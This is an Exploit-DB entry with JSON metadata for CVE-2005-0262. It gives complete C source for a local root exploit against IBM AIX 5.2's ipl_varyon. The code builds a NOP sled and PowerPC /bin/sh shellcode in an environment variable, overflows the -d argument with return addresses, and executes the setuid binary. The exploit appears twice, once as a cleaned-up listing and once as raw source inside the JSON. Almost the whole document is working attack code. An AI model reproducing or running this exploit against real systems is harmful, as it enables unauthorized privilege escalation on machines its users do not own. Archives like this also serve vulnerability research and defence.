ID EDB-ID:1045
Type exploitdb
Reporter intropy
Modified 2005-06-14T00:00:00
Description
AIX 5.2 ipl_varyon Local Elevated Privileges Exploit. CVE-2005-0262. Local exploit for aix platform
/*
*
* IBM AIX ipl_varyon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+3);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
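/*
 * Build the egg and the oversized "-d" argument, then exec
 * /usr/sbin/ipl_varyon with exactly one environment string (presumably to
 * keep the stack layout, and therefore ADDRESS, predictable). On success
 * execve() does not return; every failure path reports and exits non-zero.
 */
int main(void)
{
char *buffer, *egg;
char *args[4], *envs[2]; /* 3 argv entries + NULL; 1 env entry + NULL */

buffer = malloc(BUFFERSIZE);
egg = malloc(EGGSIZE);
if (buffer == NULL || egg == NULL) {
perror("malloc");
free(buffer);
free(egg);
return 1;
}

if (cex_load_environment(egg, buffer, shellcode_binsh, EGGSIZE, BUFFERSIZE) != 0) {
fprintf(stderr, "failed to build exploit buffers\n");
free(buffer);
free(egg);
return 1;
}

args[0] = "/usr/sbin/ipl_varyon";
args[1] = "-d";
args[2] = buffer;
args[3] = NULL; /* previously stored one past the end of a 3-element array */

envs[0] = egg;
envs[1] = NULL;

execve("/usr/sbin/ipl_varyon", args, envs);

/* Only reached when the exec itself failed (missing binary, permissions...). */
perror("execve");
free(buffer);
free(egg);
return 1;
}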
// milw0rm.com [2005-06-14]
{"bulletinFamily": "exploit", "id": "EDB-ID:1045", "cvelist": ["CVE-2005-0262"], "modified": "2005-06-14T00:00:00", "lastseen": "2016-01-31T13:26:24", "edition": 1, "sourceData": "/*\r\n *\r\n * IBM AIX ipl_varyon elevated privileges exploit\r\n *\r\n * I just wanted to play with PowerPC (Tested on 5.2)\r\n *\r\n * intropy (intropy <at> caughq.org)\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#define DEBUG 1\r\n#define BUFFERSIZE 2048\r\n#define EGGSIZE 2048\r\n\r\n#define NOP 0x60\r\n#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)\r\n\r\n/* lsd */\r\nchar shellcode_binsh[] =\r\n\"\\x7c\\xa5\\x2a\\x79\" /* xor. r5,r5,r5 */\r\n\"\\x40\\x82\\xff\\xfd\" /* bnel <shellcode> */\r\n\"\\x7f\\xe8\\x02\\xa6\" /* mflr r31 */\r\n\"\\x3b\\xff\\x01\\x20\" /* cal r31,0x120(r31) */\r\n\"\\x38\\x7f\\xff\\x08\" /* cal r3,-248(r31) */\r\n\"\\x38\\x9f\\xff\\x10\" /* cal r4,-240(r31) */\r\n\"\\x90\\x7f\\xff\\x10\" /* st r3,-240(r31) */\r\n\"\\x90\\xbf\\xff\\x14\" /* st r5,-236(r31) */\r\n\"\\x88\\x5f\\xff\\x0f\" /* lbz r2,-241(r31) */\r\n\"\\x98\\xbf\\xff\\x0f\" /* stb r5,-241(r31) */\r\n\"\\x4c\\xc6\\x33\\x42\" /* crorc cr6,cr6,cr6 */\r\n\"\\x44\\xff\\xff\\x02\" /* svca */\r\n\"/bin/sh\"\r\n\"\\x05\";\r\n\r\nunsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {\r\n int count, env_size = strlen(payload) + environment_size + 4 + 1;\r\n unsigned long address, *ret_addressp;\r\n \r\n if (DEBUG) printf(\"Adding nops to environment buffer...\");\r\n for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {\r\n *(env_buffer++) = NOP;\r\n }\r\n if (DEBUG) printf(\"size %d...\\n\", count);\r\n if (DEBUG) printf(\"Adding payload to environment buffer...\");\r\n for ( count = 0; count < strlen(payload); count++ ) {\r\n *(env_buffer++) = payload[count];\r\n }\r\n if (DEBUG) printf(\"size %d...\\n\", count);\r\n\r\n env_buffer[env_size - 1] = 
'\\0';\r\n\r\n memcpy(env_buffer, \"CAU=\", 4);\r\n\r\n\tmemset(address_buffer, 'A', buffer_size);\r\n\r\n address = ADDRESS;\r\n\r\n if (DEBUG) printf(\"Going for address @ 0x%lx\\n\", address);\r\n\r\n if (DEBUG) printf(\"Adding return address to buffer...\");\r\n ret_addressp = (unsigned long *)(address_buffer+3);\r\n for ( count = 0; count < buffer_size; count += 4) {\r\n *(ret_addressp++) = address;\r\n }\r\n if (DEBUG) printf(\"size %d...\\n\", count);\r\n\r\n address_buffer[buffer_size - 1] = '\\0';\r\n\r\n return( 0 );\r\n}\r\n\r\nint main()\r\n{\r\n char *buffer, *egg;\r\n char *args[3], *envs[2];\r\n\r\n buffer = (char *)malloc(BUFFERSIZE);\r\n egg = (char *)malloc(EGGSIZE);\r\n\r\n cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);\r\n\r\n args[0] = \"/usr/sbin/ipl_varyon\";\r\n args[1] = \"-d\";\r\n args[2] = buffer;\r\n args[3] = NULL;\r\n\r\n envs[0] = egg;\r\n envs[1] = NULL;\r\n\r\n execve( \"/usr/sbin/ipl_varyon\", args, envs );\r\n\r\n return( 0 );\r\n}\n\n// milw0rm.com [2005-06-14]\n", "published": "2005-06-14T00:00:00", "href": "https://www.exploit-db.com/exploits/1045/", "osvdbidlist": ["13699"], "reporter": "intropy", "hash": "1a0e189945de8d293089f6636af82661749cedf3a6027a6d85c2a9ea34405220", "title": "AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "AIX 5.2 ipl_varyon Local Elevated Privileges Exploit. CVE-2005-0262. Local exploit for aix platform", "references": [], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1045/", "viewCount": 1, "enchantments": {"vulnersScore": 2.8}}
{"result": {"cve": [{"id": "CVE-2005-0262", "type": "cve", "title": "CVE-2005-0262", "description": "Buffer overflow in ipl_varyon on AIX 5.1, 5.2, and 5.3 allows local users to execute arbitrary code via a long -d argument.", "published": "2005-05-02T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0262", "cvelist": ["CVE-2005-0262"], "lastseen": "2017-07-11T11:14:46"}]}}